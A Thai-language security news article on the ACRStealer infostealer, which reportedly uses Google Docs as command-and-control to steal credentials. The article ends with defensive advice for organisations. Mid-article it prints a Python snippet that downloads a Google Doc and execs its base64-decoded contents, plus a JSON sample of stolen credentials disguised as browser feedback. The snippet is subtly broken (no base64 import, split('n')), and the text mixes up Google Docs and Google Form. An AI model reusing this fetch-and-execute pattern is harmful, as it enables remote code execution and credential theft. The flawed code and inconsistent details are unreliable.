มัลแวร์ ACRStealer ใช้ Google Doc เป็น C2 ในการขโมยรหัสผ่านเหยื่อ

มัลแวร์ประเภทหนึ่งที่นับว่าเป็นอันตรายต่อความปลอดภัยของข้อมูลในระดับสูงมากคือ มัลแวร์ประเภทเพื่อการขโมยข้อมูล หรือ Infostealer สำหรับข่าวนี้ อาจทำให้หลายคนต้องตระหนกอีกครั้ง

จากรายงานโดยเว็บไซต์ Cyber Security News ได้รายงานถึงการตรวจพบแคมเปญการโจมตีของมัลแวร์ ACRStealer ในช่วงวันที่ 18 กุมภาพันธ์ ค.ศ. 2025 (พ.ศ. 2568) ที่ผ่านมาโดยทางทีมวิจัยจาก ThreatSec บริษัทผู้เชี่ยวชาญด้านความปลอดภัยไซเบอร์ โดยได้เปิดเผยว่า บัญชีการใช้งานในระดับองค์กรจากอุตสาหกรรมต่าง ๆ ไม่ว่าจะเป็น การเงิน, การแพทย์ และธุรกิจออนไลน์ กว่า 12,000 บัญชี ได้ตกเป็นเหยื่อของมัลแวร์ดังกล่าวเป็นที่เรียบร้อยแล้ว โดยมัลแวร์ดังกล่าวนั้นมีความสามารถในการขโมยข้อมูลสำคัญที่หลากหลาย ไม่ว่าจะเป็นรหัสผ่าน, ไฟล์ Cookies, และ Token สำหรับการยืนยันตัวตนต่าง ๆ ที่ถูกบันทึกอยู่บนระบบ เป็นต้น

แต่ถึงการทำงานจะดูไม่แปลกประหลาดไปจากมัลแวร์ตัวอื่นในประเภทเดียวกัน แต่สิ่งที่แตกต่างออกไปนั้นคือ ตัวมัลแวร์มีการใช้ Google Docs ซึ่งเป็นส่วนหนึ่งของ Google Workspace ในการทำหน้าที่เป็นเซิร์ฟเวอร์ควบคุม (C2 หรือ Command and Control) ผ่านทาง Google Docs API โดยตัวฟังก์ชันแกนของมัลแวร์ตัวดังกล่าวนั้นจะอาศัย Google’s OAuth 2.0 ในการยืนยันตัวตนให้กับตัวมัลแวร์เพื่อทำงานรวมกับ Google Doc

โดยเริ่มต้นตัวมัลแวร์จะทำการตรวจสอบเปรียบเทียบระหว่างเลข ID ของตัวเอกสารที่กำหนดไว้บน Google Doc ว่าตรงกับหมายเลขที่ถูก Hardcoded (กำหนดค่าแบบแน่ชัด) ที่ถูกบันทึกไว้ในส่วนของการตั้งค่าของตัวมัลแวร์หรือไม่ หลังจากนั้นก็จะทำการรันโค้ด Python Snippet ทำหน้าที่ในการดึงคำสั่ง (Commands) ต่าง ๆ ที่ถูกเข้ารหัสในรูปแบบ Based-64 ที่ถูกบันทึกในรูปแบบข้อความปกติไว้บนไฟล์ Doc ลงมาถอดรหัสเพื่อสั่งการให้มัลแวร์เข้าเล่นงานเครื่องของเหยื่อตามที่แฮกเกอร์ได้ลงคำสั่งเอาไว้ นอกจากนั้นในขั้นตอนการดึงคำสั่งลงมานั้น แฮกเกอร์ยังใช้เทคนิคการเข้ารหัสในรูปแบบ AES-256-CBC ด้วย Initialization Vector (IV) แบบคงที่ (Static) เพื่อปิดบังตัวคำสั่ง และป้องกันการถูกทำวิศวกรรมย้อนกลับ (Reverse Engineering) โดยนักวิจัย และผู้เชี่ยวชาญด้านความปลอดภัยไซเบอร์ อีกด้วย โดยตัวโค้ดจะมีลักษณะดังนี้

import requests

doc_id = "1AbC2dEfGhI3JkL4MnOpQrStUvWxYz"  # Malicious Google Doc ID

url = f"https://docs.google.com/document/d/{doc_id}/export?format=txt"

response = requests.get(url)

commands = response.text.split('n')

exec(base64.b64decode(commands[0]))  # Decodes and executes the payload

สำหรับส่วนข้อมูลที่แฮกเกอร์ได้ทำการขโมยจากเครื่องของเหยื่อนั้นจะถูกนำมาบรรจุเข้ารหัสเป็นไฟล์ในรูปแบบ JSON แล้วปลอมตัวให้คล้ายคลึงกับข้อมูลส่ง (Traffic) ที่มาจากเว็บเบราว์เซอร์ ตัวอย่างเช่นข้อมูลรหัสผ่านที่ถูกขโมยได้ที่ถูกปลอมแปลงให้เหมือนกับข้อมูล “ความคิดเห็นจากผู้ใช้งาน” (User Feedback) จะมีลักษณะดังนี้

{

  "timestamp": "2025-02-21T20:01:00Z",

  "user_agent": "Mozilla/5.0",

  "feedback": "ZW5jcnlwdGVkLWNyZWRlbnRpYWxz-..."  // Base64-encoded credentials

}

โดยแหล่งข่าวได้ระบุว่า เทคนิคดังกล่าวนั้นเป็นการอาศัยกลไกการเข้ารหัสแบบ SSL ของ Google Form ที่มีความน่าเชื่อถือสูง ทำให้หลีกเลี่ยงการตรวจจับจากระบบการป้องกันการสูญเสียข้อมูล (Data-Loss Prevention หรือ DLP) ได้

ณ ปัจจุบัน ทาง Google ได้รับทราบเรื่องดังกล่าว พร้อมทั้งได้ถอนสิทธิ์การเข้าถึงไฟล์ Doc กว่า 43 ไฟล์ที่เกี่ยวข้องกับมัลแวร์ดังกล่าวเป็นที่เรียบร้อยแล้ว แต่ก็มีการแจ้งเตือนว่า ในอนาคตอาจมีมัลแวร์ตัวใหม่ หรือ แฮกเกอร์กลุ่มอื่น ๆ ที่เลียนแบบวิธีการดังกล่าวได้ นอกจากนั้นแหล่งข่าวยังได้แนะนำอีกว่า สำหรับองค์กรต่าง ๆ นั้น เพื่อการป้องกันภัย ทางทีมผู้ดูแลระบบจะต้องมีการตรวจสอบพฤติกรรมการทำงานของ Google API ต่าง ๆ อย่างเข้มงวด โดยเฉพาะอย่างยิ่งเมื่อมีการตรวจพบการร้องขอ (Request) ในการเข้าถึงเอกสารที่มีการตั้งชื่อแปลก ๆ ให้คาดการณ์ไว้ว่าอาจเป็นการกระทำของมัลแวร์ตัวดังกล่าว พร้อมกับออกกฎบังคับให้ใช้การยืนยันตัวตนจากหลายทาง (Multi-Factors Authentication) ในการเข้าถึงการใช้งาน Google Workspace และจำกัดการใช้งาน Google Workspace กับแอปพลิเคชันแบบ 3^rd-Party เพื่อลดความเสี่ยงดังกล่าว